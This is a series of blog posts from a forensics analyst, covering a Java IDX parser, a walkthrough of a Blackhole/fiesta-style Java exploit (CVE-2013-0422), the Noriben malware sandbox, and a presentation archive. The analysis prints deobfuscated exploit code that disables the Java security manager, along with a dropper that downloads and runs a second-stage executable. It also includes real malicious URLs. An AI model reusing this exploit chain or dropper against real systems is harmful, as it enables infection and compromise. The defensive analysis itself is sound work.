On a side note, I had hoped for this to be a personal challenge for me to unwind on while moving. Upon posting my initial program I packed away my PC and began moving to my new home. Two weeks later, after digging out and setting up, I found that the file was used as a catalyst for some awesome analysis. I applaud the great effort and documentation made byMark Woan and Joachim Metz.

In the weeks since the initial release I added numerous features and learned more about the structure. I learned that the file is composed of five distinct "sections", as named by Java:
  • Section 1 - Basic metadata on the status of the download. Was it completed successfully? What time was it completed at? How big is the IDX file?
  • Section 2 - Download data. This is the "text" section of the file and contains numerous length-prefixed strings situated in Field:Value pairs
  • Section 3 - Compressed copy of the JAR file's MANIFEST document
  • Section 4 - Code Signer information, in Java Serialization form
  • Section 5 - Additional data (Haven't found a file yet with this)
It's somewhat difficult to measure the forensic value of the data recovered from sections 3 and 4. The Manifest does give information on what version of Java the applet was compiled with, and for, but is just a duplicate if the JAR is still present on the infected system. Section 4 data typically provided scant details, sometimes just the character "0" or just null bytes, on Java malware I've analyzed. Instead of attempting interpretation on this data, I've just displayed it to the screen for our posterity to unravel.

When put into use on the sample we're analyzing, here are the results shown from my IDX Parser.

E:\Development\Java_IDX_Parser>idx_parser.py e:\malware\java_XXX\1c20de82-1678cc50.idx
Java IDX Parser -- version 1.3 -- by @bbaskin
IDX file: e:\malware\java_XXX\1c20de82-1678cc50.idx (IDX File Version 6.05)

[*] Section 2 (Download History) found:
URL: http://80d3c146d3.gshjsewsf.su:82/forum/dare.php?hsh=6&key=b30a14e1c597bd7215d593d3f03bd1ab
IP: 50.7.219.70
<null>: HTTP/1.1 200 OK
content-length: 7162
last-modified: Mon, 26 Jul 2001 05:00:00 GMT
content-type: application/x-java-archive
date: Sun, 13 Jan 2013 16:22:01 GMT
server: nginx/1.0.15
deploy-request-content-type: application/x-java-archive


[*] Section 3 (Jar Manifest) found:
Manifest-Version: 1.0
Ant-Version: Apache Ant 1.8.3
X-COMMENT: Main-Class will be added automatically by build
Class-Path:
Created-By: 1.7.0_07-b11 (Oracle Corporation)


[*] Section 4 (Code Signer) found:
[*] Found: Data block.  Length: 4
Data:                   Hex: 00000000
[*] Found: Data block.  Length: 3
Data: 0                 Hex: 300d0a
Analysis of the infected file system showed activity to a completely different web site, and then a sudden infection. By timelining the events, I found the missing download information from the Java malware in the IDX file, from a domain not found elsewhere on the system.
There are a number of Java IDX parsers out there, which emerged quickly after I first published mine. Many provide good starting ground for getting obvious artifacts from the file, but I do recommend trying them all to see which works best for you.


Java Malware Analysis


With the relevant Java malware file identified, I began the analysis of the file. Typically, many examiners use a free decompiler like JD-GUI, which is a pretty useful tool for the cost. However, I've found in many cases that JD-GUI cannot appropriately decompile most of the file and ends up disassembling most of it. This means that the analysis isn't done on clean Java code, but instead on Java op-codes. This is certainly possible, and I gave a presentation to the Northern Virginia Hackers group this last year on how to do that, but it's a lot of effort and tiresome. Instead, through a thorough analysis of the current tools available, I've switched to AndroChef for all of my analysis. It still misses some, but decompiles mode code that other tools cannot.

Before going in, VirusTotal reports that this file flagged 2/46 engines for CVE-2013-0422. That gives us a clue of what exploit code to search for.

Using AndroChef on the malware file I was able to retrieve the Java code, which was contained across five separate Class files. These Class files alone are compiled modules, but data can traverse across them, requiring an examiner to analyze all of them simultaneously. For me, the easiest method is to copy and paste them all into one text document, to edit with Notepad++. This allows me to sweep-highlight a variable and quickly find every other location where that variable is in use. After a cursory analysis, I try to determine, at a high level, the purpose of each class:
  • Allaon.class - Contains all of the strings used in the malware
  • Lizixk - Contains the dropper code
  • Morny - Contains the text decryption routines
  • Rvre - Contains an embedded Java class
  • Zend - Contains the main code
The JAR also contained the standard META-INF/MANIFEST file, which matched the results shown from my IDX parser.

If you don't want to decode these files yourself, I have them available here for download.

The text within Allaon.class is obfuscated by including the text ""Miria_)d" throughout each string, as shown below:

   public static String Gege = "fiesta".replace("Miria_)d", "");
   public static String Gigos = "sMiria_)dun.iMiria_)dnvoke.aMiria_)dnon.AMiria_)dnonMiria_)dymousClasMiria_)dsLoMiria_)dader".replace("Miria_)d", "");
   public static String Momoe = "f" + "ilMiria_)d///".replace("Miria_)d", "e:");
   public static String BRni = "j" + "avMiria_)da.io.tmMiria_)dpdiMiria_)dr".replace("Miria_)d", "");
   public static String Tte3 = "heMiria_)dhda.eMiria_)dxe".replace("Miria_)d", "");
   public static String Contex = "sun.orMiria_)dg.moziMiria_)dlla.javascMiria_)dript.inMiria_)dternal.ConMiria_)dtext".replace("Miria_)d", "");
   public static String ClsLoad = "sun.orMiria_)dg.mozMiria_)dilla.javasMiria_)dcript.inteMiria_)drnal.GeneraMiria_)dtedClaMiria_)dssLoader".replace("Miria_)d", "");
   public static String hack3 = "SophosHack";
   public static String Fcons = "fiMiria_)dndConstrMiria_)ductor".replace("Miria_)d", "");
   public static String Fvirt = "fiMiria_)dndVirtMiria_)dual".replace("Miria_)d", "");
   public static String hack2 = "SophosHack";
   public static String Crtcls = "creaMiria_)dteClasMiria_)dsLMiria_)doader".replace("Miria_)d", "");
   public static String DEfc = "defiMiria_)dneClaMiria_)dss".replace("Miria_)d", "");
By performing a simple find/replace, removing excess code, and globally giving descriptive variable names, the following results are then shown:


   public static String FiestaTag = "fiesta"
   public static String InvokeAnonClassLoader = "sun.invoke.anon.AnonymousClassLoader"
   public static String FileURI = "file:///"
   public static String TempDir = "java.io.tmpdir"
   public static String s_hehda_exe = "hehda.exe"
   public static String MozillaJSContext = "sun.org.mozilla.javascript.internal.Context"
   public static String MozillaJSClassLoader = "sun.org.mozilla.javascript.internal.GeneratedClassLoader"
   public static String hack3 = "SophosHack";
   public static String s_findConstructor = "findConstructor"
   public static String s_findVirtual = "findVirtual"
   public static String hack2 = "SophosHack";
   public static String s_createClassLoader = "createClassLoader"
   public static String s_defineClass = "defineClass"
This provides a much better clue as to what is going on, especially as the author was a bit constructive in his variable naming and didn't randomize them upon deployment. I can then highlight each variable and find where else in the code that string is being used. I will then continue to find any such obfuscation throughout the code and remove it bits at a time, condensing the code back to what it was originally written as.
By following the logic, and renaming variables (globally) when needed, we get a main code function that boils down to:

   public void init() {
      try {
         Rvre.sfgkytoi = this.getParameter("fiesta");
         byte[] Embedded_Java_Class = Rvre.Hex2Bin(Embedded_Java_Class_hex);

JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", (MBeanServer)null, (MBeanServerDelegate)null);
MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
Object a = null;
Class localClass1 = localMBeanInstantiator.findClass(Allaon.Contex, (ClassLoader)a);
Class localClass2 = localMBeanInstantiator.findClass(Allaon.ClsLoad, (ClassLoader)a);
Lookup lolluk = MethodHandles.publicLookup();
MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[]{MethodType.class});
MethodHandle localMethodHandle1 = lolluk.findVirtual(Lookup.class, Allaon.Fcons, localMethodType1);
MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[]{lolluk, localClass1, localMethodType2});
Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
MethodType ldmet3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[]{String.class, MethodType.class});
MethodHandle localMethodHandle3 = lolluk.findVirtual(Lookup.class, "findVirtual", ldmet3);
MethodType ldmet4 = MethodType.methodType(localClass2, ClassLoader.class);
MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[]{lolluk, localClass1, "createClassLoader", ldmet4});
Object lObj2 = localMethodHandle4.invokeWithArguments(new Object[]{localObject1, null});
MethodType ldmet5 = MethodType.methodType(Class.class, String.class, new Class[]{byte[].class});
MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[]{lolluk, localClass2, "defineClass", ldmet5});

         
         Class lca3 = (Class)localMethodHandle5.invokeWithArguments(new Object[]{lObj2, null, Embedded_Java_Class});
         lca3.newInstance();
         Lizixk.DropFile_Exec();
      } catch (Throwable var22) {
         ;
      }
   }
Much of this is straight forward. However, there is a very large block of "MethodType" and "MethodHandle" calls that are a result of the exploit, CVE-2013-0422. More on this exploit is found on Microsoft's Technet site.  The actual runtime magic appears as a single function call to the Lizixk class, which contains a function to retrieve an executable, decode it, drop it to %Temp%, and run it.  But how can such malicious logic work? A view at the top of this same function shows us the actual exploit that makes it happen. This function contains a long, obfuscated string value that has the phrase "mMoedl" throughout it, similar to the encoding used by the strings in Allaon. Upon removing this excess text, we can clearly see the first eight bytes as "CAFEBABE":


public static String Ciasio = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017"
This is the magic value, in hex, for compiled Java code. That tells us what we're looking at and that it needs to be converted to hex and saved to a file. Doing so produces another file that we can decompile with AndroChef, producing the following code:


import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
public class B implements PrivilegedExceptionAction {
   public B() {
      try {
         AccessController.doPrivileged(this);
      } catch (Exception var2) {
         ;
      }
   }
   public Object run() {
      System.setSecurityManager((SecurityManager)null);
      return new Object();
   }
}
Wow! Such simple code, but you can see a few items that are glaring. First off, this file was flagged by VirusTotal as 1/46 for Java/Dldr.Pesur.AN. This code really just changes the local security privileges of the parent code, giving it the ability to drop and execute the second-stage malware.
With everything analyzed, we stopped at the function call from Class Lizixk to drop and malware. Now that the exploit was launched, as privileges were escalated, this dropper routine is ran:


public class Lizixk {
   public static String TempDir = getProperty("java.io.tmpdir");
   static InputStream filehandle;
   public static void DropFile_Exec() throws FileNotFoundException, Exception {
      if(TempDir.charAt(TempDir.length() - 1) != "\\") {
         TempDir = TempDir + "\\";
      }
      String Hehda_exe = TempDir + "hehda.exe";
      FileOutputStream output_filehandle = new FileOutputStream(Hehda_exe);
      DownloadEXE();
      int data_size;
      for(byte[] rayys = new byte[512]; (data_size = filehandle.read(rayys)) > 0; rayys = new byte[512]) {
         output_filehandle.write(rayys, 0, data_size);
      }
      output_filehandle.close();
      filehandle.close();
      Runtime.getRuntime().exec(Hehda_exe);
   }
   public static void DownloadEXE() throws IOException {
      URL fweret = new URL(Morny.data_decode(fiesta));
      fweret.openConnection();
      filehandle = fweret.openStream();
   }
}
There are two routines in play here, renamed by me: DropFile_Exec() and DownloadEXE(). The first is called by Class Zend and is responsible for determining the Temporary folder (%Temp%) and creating a file named "hehda.exe". It then calls DownloadEXE(). This latter routine retrieves the embedded HTML data for the parameter "fiesta", decodes it with a custom routine to retrieve a URL, then downloads that file to "hehda.exe".

After this, the file is run and the second-stage malware begins. This is standard operating procedure, as the second-stage typically belongs to the operator who purchased the exploit kit and wants their malware installed. They just require the use of the first-stage (Black Hole) to get it running on the system.


Custom Data Encoding


I have a deep love for custom encoding and encryption routines, so even without the raw data, I analyzed the encoding for the URL, found in Class Morny:

   public static String data_decode(String web_data) {
      int byte_pos = 0;
      web_data = (new StringBuffer(web_data)).reverse().toString();
      String decoded_data = "";
      web_data = web_data.replace("a-nytios", "");
      for(int i = 0; i < web_data.length(); ++i) {
         ++byte_pos;
         if(byte_pos == 3) {
            decoded_data = decoded_data + web_data.charAt(i);
            byte_pos = 0;
         }
      }
      return decoded_data;
   }
There's a lot of little routines going on here. The encoded data is retrieved from the web site HTML, then put into reverse order. It removes the text instances of "a-nytios" from the data, just like how the Java did with its embedded data. It then retrieves every third byte of the data, discarding the rest. For example:



Encoded: z1eZmxsoityn-a7aeeF.pxlhsiTxvR7ejI/H4soityn-amuto6IceE.yre9EtcNii7scKdtsoityn-aJazybPT.ZSwFqsoityn-awNSwPd/p8/Mu:YVpsoityn-aEQtRrtH4soityn-ahgR
Reversed: Rgha-nytios4HtrRtQEa-nytiospVY:uM/8p/dPwSNwa-nytiosqFwSZ.TPbyzaJa-nytiostdKcs7iiNctE9ery.EecI6otuma-nytios4H/Ije7RvxTishlxp.Feea7a-nytiosxmZe1z
Phrase-removedRgh4HtrRtQEpVY:uM/8p/dPwSNwqFwSZ.TPbyzaJtdKcs7iiNctE9ery.EecI6otum4H/Ije7RvxTishlxp.Feea7xmZe1z
Every third byte: http://www.badsite.com/evil.exe


One reason I call this out is because there's little reporting on the routine. It's common across multiple variants of BlackHole/Redkit/fiesta/etc. You understand it better by reading through the code (and recreating it in Python/Perl) than guessing your way through it (see "llobapop" ;))

Second-Stage Malware Analysis


The end result of this Java malware is to place a single executable onto your system and run it. The malware doesn't even know where that executable is to come from, it relies upon an external source ("fiesta" parameter) to tell it where to download it from. This is how we separate the various stages of an infection. The Java first-stage is the Trojan horse to breach the walls, while hehda.exe is the Greek army hidden within.
Through the infection, we found that the second-stage malware was a variant of the ZeroAccess Rootkit, a pretty nasty piece of work. However, our time has grown long on this post so I will leave analysis of that file for the next one. We will reconvene to discuss ZeroAccess, how it entrenches itself onto the system, how IDA Pro likes to puke on it, and how Windows undocumented API calls give it so much power over your computer.

Noriben - Your Personal, Portable Malware Sandbox

$
0
0

Announcing Noriben


Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities.

Noriben is an ideal solution for many unusual malware instances, such as those that would not run from within a standard sandbox environment. These files perhaps required command line arguments, or had VMware/OS detection that had to be actively debugged, or extremely long sleep cycles. These issues go away with Noriben. Simply run Noriben, then run your malware in a way that will make it work. If there is active protection, run it within OllyDbg/Immunity while Noriben is running and bypass any anti-analysis checks. If it has activity that changes over days, simply kick off Noriben and the malware for a long weekend and process your results when you return to work.

Noriben only requires Sysinternals procmon.exe. You may optionally first tailor Procmon to your particular VM, a step that is unique to each individual person and their environment, in order to filter out the noise of benign activity from logs. Alternatively, the filtering within Procmon can be kept sparse and you could instead place numerous filters from within Noriben to filter out the noise. (My personal preference is to perform moderate filtering from within Procmon and the rest from Noriben, which allows me to quickly remove filters for specific malware that likes to mimic benign services.) If you create Procmon filters, simply save the file as ProcmonConfiguration.pmc and save it in the same folder as Noriben.py

Simply run Noriben and wait for it to setup. Once prompted, run your malware in another window. When the malware has reached a point of activity necessary for analysis, stop Noriben by pressing Ctrl-C. Noriben will then stop the logging, gather all of the data, and process a report for you. It then generates three files, all timestamped: a Procmon PML database, a text CSV document, and a text TXT file. The PML and CSV files constitute the main source of activity, with the TXT being the final report made after applying filters. Found too many false positives in your report? Simply delete the TXT file, add filters to Noriben.py directly, and rerun it with the "-r <filename>.csv" option to re-run analysis from the CSV.

Noriben - Origins


After many years in the Information Security industry, and training forensic investigators from every walk of life, I tend to hear the same complaints from most analysts. There is simply too much work to perform with not enough of a budget to purchase adequate tools. This is a growing concern for those in the malware analysis field, where the amount of malicious files comes in at a pace faster than most can keep up with.

To counter this problem, many organizations have found themselves putting a greater weight on automated tools. The industry targeting this particular segment has exploded in the past two years, with multiple large companies coming out with a large number of tools to help strained teams, but at large financial costs.

As a resourceful analyst of a small team, usually called to help out in surge support for others, I've had to find ways to work smarter with the tools I have. While setting up a Cuckoo sandbox server is a free and preferred method for quick analysis, I needed something more nimble and portable. This issue came up when I assisted on a response and was given a laptop upon arrival, one that lacked most basic malware tools. Working alongside a team of junior analysts, we had a large mountain of files to analyze, with no ready access to the Internet to analyze files quickly. The answer came with using simple tools already on the network, used by the system administrators, namely the Sysinternals Procmon. Procmon is already in the arsenal of most malware analysts as a way to monitor system activity during dynamic analysis. By using native functionality within Procmon, a comma delimited file (CSV) file can be generated, which was then analyzed through specifically tailored grep searches. That effort turned into a way of automating the process to be used by dozens of people. After months of personal usage and testing, then end result was Noriben.

Noriben in Action


In my last blog post, I showed one of my recent tools for parsing Java IDX files, a forensic byproduct of Java-based malware infections. In that post we talked about the first-stage malware attack which was used solely to drop a file named hehda.exe to the user's Temporary folder. What was that executable and what does it do? Let's turn to Noriben:


Place your Noriben files (Noriben.py, procmon.exe, and optionally ProcmonConfiguration.pmc) into any standard Windows virtual machine. Then copy your malware to the VM.
Run Noriben and you will receive the following text:




After awhile I see the original malware file, hehda.exe, disappear from my desktop. I wait about a minute and then press Ctrl-C to stop the scan. The following text is then displayed:



Notepad then automatically opens the resulting text report shows a lot of data, seen below at the following link (because the output is so large):

Original Report

Now, this could be better. So, I adjust my filters by adding in the items that don't interest me. I do this on the fly with this instance of Noriben.py within the VM, knowing that the changes are particular to this VM and that the new filters will be erased when I revert my snapshot. I then rescan my file by using "Noriben.py -r", as shown below:



The resulting report is much easier to process:

Filtered Report

From this, we can see a few items of high notability. The processes show Hehda.exe being executed, and then spawning cmd.exe:

[CreateProcess] Explorer.EXE:1432 > "C:\Documents and Settings\Administrator\Desktop\hehda.exe" [Child PID: 2520]
[CreateProcess] hehda.exe:2520 > "C:\WINDOWS\system32\cmd.exe" [Child PID: 3444]

By following cmd.exe's PID, we can see it is later responsible for deleting hehda.exe.
Hehda.exe drops a few very interesting files, including:

[CreateFile] hehda.exe:2520 > C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\n  [MD5: cfaddbb43ba973f8d15d7d2e50c63476]
[CreateFile] hehda.exe:2520 > C:\RECYCLER\S-1-5-18\$fab110457830839344b58457ddd1f357\n [MD5: cfaddbb43ba973f8d15d7d2e50c63476]

Right away, a Google search on this MD5 value returns many interesting results that tell us that the file was virus scanned as ZeroAccess. The filenames themselves are also indicative of ZeroAccess.

How did this file gain persistence on the victim machine? Now that we see the files, we can peruse the registry values and see the following items:

[CreateKey] hehda.exe:2520 > HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}
[CreateKey] hehda.exe:2520 > HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32
[SetValue] hehda.exe:2520 > HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32\ThreadingModel  =  Both
[SetValue] hehda.exe:2520 > HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32\(Default)  =  C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\n.

And what other damage did it do? Well, it looks like it took out a few notable services, including those for the Windows Firewall and Windows Security Center:

[SetValue] services.exe:680 > HKLM\System\CurrentControlSet\Services\SharedAccess\DeleteFlag  =  1
[SetValue] services.exe:680 > HKLM\System\CurrentControlSet\Services\SharedAccess\Start  =  4
[SetValue] services.exe:680 > HKLM\System\CurrentControlSet\Services\wscsvc\DeleteFlag  =  1
[SetValue] services.exe:680 > HKLM\System\CurrentControlSet\Services\wscsvc\Start  =  4

That is one nasty piece of work. But, it gets better when we get down to the network traffic:

[UDP] hehda.exe:2520 > google-public-dns-a.google.com:53
[UDP] google-public-dns-a.google.com:53 > hehda.exe:2520
[HTTP] hehda.exe:2520 > 50.22.196.70-static.reverse.softlayer.com:80
[TCP] 50.22.196.70-static.reverse.softlayer.com:80 > hehda.exe:2520
[UDP] hehda.exe:2520 > 83.133.123.20:53
[UDP] svchost.exe:1032 > 239.255.255.250:1900
[UDP] services.exe:680 > 206.254.253.254:16471
[UDP] services.exe:680 > 190.254.253.254:16471
[UDP] services.exe:680 > 182.254.253.254:16471
[UDP] services.exe:680 > 180.254.253.254:16471
[UDP] services.exe:680 > 135.254.253.254:16471
[UDP] services.exe:680 > 134.254.253.254:16471
[UDP] services.exe:680 > 117.254.253.254:16471
[UDP] services.exe:680 > 115.254.253.254:16471
[UDP] services.exe:680 > 92.254.253.254:16471
[UDP] services.exe:680 > 88.254.253.254.dynamic.ttnet.com.tr:16471
[UDP] services.exe:680 > 254.253.254.87.dynamic.monaco.mc:16471



The large list of IP addresses to UDP port 16471 are another big indicator for ZeroAccess. Upon doing open research, you'll find that the dropped file "@" is a list of IP addresses used to bootstrap the malware onto the botnet network. Additionally we see a request to "50.22.196.70-static.reverse.softlayer.com", the known domain for the MaxMind Geolocational service API, giving the botnet owners a sense of where in the world your computer lies.

Conclusions / Post Analysis Mitigation


The goal of Noriben is to provide very quick and simple answers to your questions, either to a more in-depth analysis of an infected system, a better understanding of a malware's capabilities without static analysis, or to quickly craft network filters to look for (and block) other infections. What files were created? What MD5s should I scan for? What network hosts and ports are being used? The pure text report allows you to quickly see data and copy/paste it to a relevant solution.

Noriben is not a turn-key solution. While the built-in filters will remove most innocuous items, the user will likely need to adjust and add new filters to remove additional benign entries. It's highly recommended to run Noriben in your VM and run benign applications to modify the built-in filters to meet your particular operating system.  Editing is extremely easy, just edit Noriben.py with any text editor and add new items to the respective black list.

Noriben is hosted on GitHub

P.S. Why call it Noriben? Noriben (海苔弁) is a very simple Japanese lunch box. Noriben are plentiful in shops, provide your basic nourishment, and are a staple meal for a struggling family. It felt only appropriate to analogize it to Noriben.py, a very simple sand box that provides basic indicators, can directly feed your security solutions, and fits easily within the budget of any organization.

P.P.S. If you have any errors or unusual items that you want to report, email the PML/CSV/TXT files (ZIP is fine) to brian -=[at]=- thebaskins -=[dot]=- com. Additionally, if you have any notable filter items that you would like to share, I will review them and, if helpful, add to the trunk with credit to you.
1 May 13: Rewritten to be forward compatible to Python 3.X. Works in both versions of Python now.
30 Apr 13: Regular Expression support implemented and working.
17 Apr 13: Major bug fixes in filters. Now dramatically reduces false positives.
16 Sep 13: Version 1.4 now lets you specify the malware on the cmdline and specify a timeout period to be more sandbox-like. It also has the feature of generalizing path to their relative environment variable. More on that here.

Noriben version 1.1 Released

$
0
0
I've made available the latest version of Noriben with some much-needed updates.

The greatest update is a series of added filters that dramatically help to reduce false positive items in the output. This was missing from the first release due to an oversight on my part, and an unknown usability feature in Procmon. I use my own personal Procmon filters for malware analysis, which are not provided for users to download. The mistake was that I was under the assumption that removing this filter file would prevent Procmon from using them and would provide me the output that everyone else would see. That was a wrong assumption; Procmon stores a backup in the registry.

After seeing the output produced when @TekDefense ran Noriben, I quickly realized the sheer amount of items that should not be in the report, and rushed to fix this.

While updating the filters, I applied a few new improvements under the hood in how filters were applied. Primarily, filters now support regular expressions, though I have not implemented any at this point. Additionally, filters can now include environment variables. So, instead of hard-coding "C:\Users\Brian\AppData\...", which would change on every single machine, a filter can read "%UserProfile%\AppData\...". This lends to greater portability of the script, allowing it to use the same filter set on any machine with no changes.

The new version of Noriben, version 1.1, is available on GitHub here.

If you have any errors or unusual items that you want to report, email the PML/CSV/TXT files (ZIP is fine) to brian -=[at]=- thebaskins -=[dot]=- com. Additionally, if you have any notable filter items that you would like to share, I will review them and, if helpful, add to the trunk with credit to you.


Update (30 Apr 13): I made a gross failure in testing the Regular Expression feature in version 1.1. In short, it didn't work. That's been rectified, and it's working perfectly. I also added some rules on how to create new rules, to meet the requirements of the regular expression parser.

Ghetto Forensics!

$
0
0
While I have maintained a blog on my personal website (www.thebaskins.com) for many years, the process of creating new posts on it has become cumbersome over time. As I perform more technical posts, they felt out of place on a personal site. After some weeks of contemplation, I've forked my site to place my new technical content on a site for itself, here, at Ghetto Forensics.

Why Ghetto Forensics? Because this is the world in which we operate in. For every security team operating under a virtual unlimited budget, there are a hundred that are cobbling together a team on a shoestring budget using whatever tools they can. This is the world I've become used to in my long career in security, where knowledgeable defenders make do as virtual MacGyvers: facing tough problems with a stick of bubble gum,  a paperclip, and some Python code.

Many don't even realize they're in such a position. They've created an environment where they are continually on the ball and solving problems, until they are invited to a vendor demonstration where a $10,000 tool is being pitched that does exactly what their custom script already performs. Where an encrypted file volume isn't met with price quotes, but ideas such as "What if we just ran `strings` on the entire hard drive and try each as a password?".

Ghetto forensics involves using whatever is at your disposal to get through the day. Ghetto examiners don't have the luxury of spending money to solve a case, or buying new and elaborate tools. Instead, their focus is to survive the day as cheaply and efficiently as possible.

Have a tough problem? No EnScript available? Then work through five different, free tools, outputting the results from one to another, until you receive data that meets your demands. Stay on top of the tools, constantly reading blog posts and twitter feeds of others, to see what is currently available. Instead of swishing coffee in a mug while waiting for keyword indexing, having the luxury of weeks to perform an examination, you are multitasking and updating your procedures to go directly after the data that's relevant to answering the questions. Fix your environment so that you can foresee and tackle that mountain of looming threats instead of constantly being responsive to incidents months after the fact.

These are many of the ideals I've learned from and taught others. While others adopted the mentality of posting questions to vendors and waiting for a response, we've learned to bypass corporate products and blaze our own trails. When I helped develop a Linux Intrusions class in 2002, the goal was to teach how to investigate a fully-fledged network intrusion on their zero-dollar budgets. We used Sleuthkit, and Autopsy, and OpenOffice. We created custom timelines and used free spreadsheet (Quattro) to perform filtering and color-coding. Students learned how to take large amounts of data and quickly cull it down to notable entries using grep, awk, and sed. And, when they returned to their home offices, they were running in circles around their co-workers who relied upon commercial, GUI applications. Their task became one of not finding which button to click on, but what data do I need and how do I extract it.

Join me as we celebrate Ghetto Forensics, where being a Ghetto Examiner is a measure of your ingenuity and endurance in a world where you can't even expense parking.

Presentation Archive

$
0
0

Below are a series of presentations I've given over the years, though not a fully inclusive list. Many are too sensitive (FOUO/LES/S/TS/SAP/EIEIO) to store, and others have been lost to digital decay. But, the remainder have been recovered and digitally remastered for your enjoyment.

Walking the Green Mile: How to Get Fired After a Security Incident:

Abstract: Security incidents targeting corporations are occurring on a daily basis. While we may hear about the large cases in the news, network and security administrators from smaller organization quake in fear of losing their jobs after a successful attack of their network. Simple bad decisions and stupid mistakes in responding to a data breach or network intrusion are a great way to find yourself new employment. In this talk I'll show you in twelve easy steps how to do so after, or even during, a security incident in your company.
Notable Venues: Derbycon 1.0, Defcon Skytalks, BSides Las Vegas


Below is a video feed of the talk given at the first ever Derbycon. It was an early morning slot, and I was somehow blissfully unaware that I was being recorded, which may be why I feel it was the best recording of the talk.



Intelligence Gathering Over Twitter:

This was a basic-level presentation geared for a law enforcement audience. It taught the basics of how to use Twitter but also delved into specialized tools to collect and analyze large amounts of data, to help infer relationships and associations. This slide deck is slightly redacted, as much of the good stuff was given orally in the presentation.
Notable Venues: DoD Cyber Crime Conference


Information Gathering Over Twitter from Brian Baskin

Malware Analysis: Java Bytecode

Abstract: This was a short talk given to NoVA Hackers soon after working through a Zeus-related incident response. The Javascript used to drop Zeus on the box had a few layers of obfuscation that I had not seen discussed publicly on the Internet. This was was originally given unrecorded and only published a year later.



P2P Forensics: 

Abstract: Years ago I began working on an in-depth protocol analysis talk about BitTorrent so that traffic could be monitored. This grew into a BitTorrent forensics talk which grew into an overall P2P Forensics talk. At one point, it was a large two-hour presentation that I had to gently trim down to an hour. Given at multiple venues, each was modified to meet that particular audience (administrators, criminal prosecutors, military).
Notable Venues: GFIRST, DoD Cyber Crime Conference, DojoCon, Virginia State Police Cyber Workshop, USAF ISR Information Security Conference, USDoJ CCIPS Briefing, AFOSI Computer Crime Workshop



The only video recording of the talk, recorded at DojoCon 2010, for a technical audience.

Brian Baskin, @bbaskin P2P Forensics from Adrian Crenshaw on Vimeo.


Casual Cyber Crime:

Abstract: We're living in an age of devices and applications that push the boundaries of dreams, an age of instant gratification, but also the age of Digital Rights Management and Copyright laws. With questionably illegal modifications becoming simple enough for children to use, where does the line get drawn between squeezing more functionality out of your digital devices and software and breaking felony laws? In this talk attendees will explore the justifications and rationales behind the use of questionable hardware and software modifications and understand the mentality behind why their use is rapidly catching on in the general population.
Notable Venues: TechnoForensics


31337 Password Guessing

$
0
0
In the digital forensics and incident response we tend to deal with encrypted containers on a regular basis. With encrypted containers means dealing with various styles and iterations of passwords used to access these containers. In a large-scale incident response, it's not uncommon to have a dedicated spreadsheet that just maintains what passwords open what volumes, with the spreadsheet itself password protected.

But, what happens when you forget that password?



The common problems I've run into have been trying to access a volume months, sometimes years, after the fact. In civil cases, we've been surprised to see a case resurface years after we thought it had been settled, and rushed back to open old archives. This inevitably leaves us asking "Did I use a zero or an `O` for that byte?"

By making a spreadsheet of every possible password permutation, we've always been able to get to the data, but the issue does occasionally pop up.

For instance, in an intrusion-related case, a case agent used their agency's forensics group to seize a laptop drive. The drive contained a user file encrypted with TrueCrypt. Through the telephone-game, the owner says the password is XooXooX, which the responder writes as xooxoox, which is transcribed by the case agent as X00x00x. Attempts to decrypt the volume fail, and being that the original responder has now moved on and no notes were kept, all we're told is that the password is "something like ....".

Reasonable and resourceful shops would then write custom password filters to throw into software like PRTK, using DNA clustering to quickly determine the password. However, you don't work in a reasonable and resourceful shop. You can't afford PRTK. What do you do? Write a password guesser in Python that just uses TrueCrypt.




TrueCrypt has a variety of command-line arguments to automatically mount images given a specified password:


With these in mind, we can craft a command-line argument to mount the volume, and rely upon TrueCrypt's return code (0 or 1) to tell us if the mount was successful or not.

